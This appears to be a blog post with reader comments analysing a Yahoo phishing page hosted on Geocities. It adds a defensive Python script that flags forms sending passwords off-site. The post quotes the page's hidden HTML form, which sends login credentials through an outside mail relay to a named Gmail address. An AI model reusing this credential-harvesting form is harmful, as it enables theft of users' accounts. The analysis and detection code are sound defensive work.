Recently, I have been getting a lot of messages from people in my Yahoo list, which read something like this:
http://www.geocities.com/bisxybiotch/
Strange, I thought. The geocities homepage looks very similar to the Yahoo Photos page, prompting me for a login id/password. I thought something was not right. On downloading the page and reading through the HTML source, I could see something like this:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="bisxybiotch@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos">
On converting the integer values (HTML numeric character references) to ASCII characters, the form tag looked like this:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
I started Ethereal to check what data was being transmitted. I used a fake user id and password, and I could see the credentials being posted to the mailto.cgi script on that website. I think it mails the credentials to that Gmail id, and once it has a valid password, it would fetch my contact list and send the same malicious message to all of them as well...
An example of "Semantic Attacks".
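The same inspection can be automated for a defender. The following is an added example, not code from the original post: it decodes the numeric character references that hid the markup, parses every form on a page, and flags any form that sends a password field to a host other than the page's own or that carries the form-to-mail relay's hidden fields (Mail_To, Next_Page and friends). The sample HTML, its hosts and its e-mail address are constructed placeholders modelled on the form above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden-field names used by the form-to-mail relay described in the post.
RELAY_FIELDS = {"mail_from", "mail_to", "mail_subject", "next_page"}

class FormCollector(HTMLParser):
    """Record every <form> with its action URL and the (type, name) of each input."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # html.parser lowercases tag/attribute names
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["inputs"].append((a.get("type", "text").lower(), a.get("name", "").lower()))
    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit_forms(page_url, raw_html):
    """Return findings for forms that post a password off-site or carry relay fields."""
    # Numeric character references (&#60; is '<') hide the markup from a casual
    # view-source; decode them first so the real form tags become parseable.
    parser = FormCollector()
    parser.feed(html.unescape(raw_html))
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for form in parser.forms:
        types = {t for t, _ in form["inputs"]}
        hidden = {n for t, n in form["inputs"] if t == "hidden"}
        action_host = urlparse(form["action"]).hostname or page_host  # relative action stays on-site
        reasons = []
        if "password" in types and action_host != page_host:
            reasons.append("password field posts off-site to " + action_host)
        if hidden & RELAY_FIELDS:
            reasons.append("form-to-mail relay fields: " + ", ".join(sorted(hidden & RELAY_FIELDS)))
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings

# Constructed sample modelled on the form in the post: the opening tag is entity-encoded
# the way the original hid it, and the hosts and address are placeholders.
SAMPLE_HTML = (
    '&#60;FORM METHOD="POST" ACTION="http://relay.example/form/mailto.cgi">'
    '<INPUT TYPE="hidden" NAME="Mail_To" VALUE="attacker@example.com">'
    '<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.example/my_photos">'
    '<INPUT TYPE="text" NAME="login"><INPUT TYPE="password" NAME="passwd"></FORM>'
)
```

Calling `audit_forms("http://www.geocities.com/somepage/", SAMPLE_HTML)` reports the relay action with both reasons, while a form whose action is a relative path on the same host produces no finding.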
I should say that was a good investigation! Good work!
I had also got that message and tried checking that webpage... I don't remember if I entered the login/password.
BABS
Good Find
Good Find..... I am not sure whether I entered my username and password.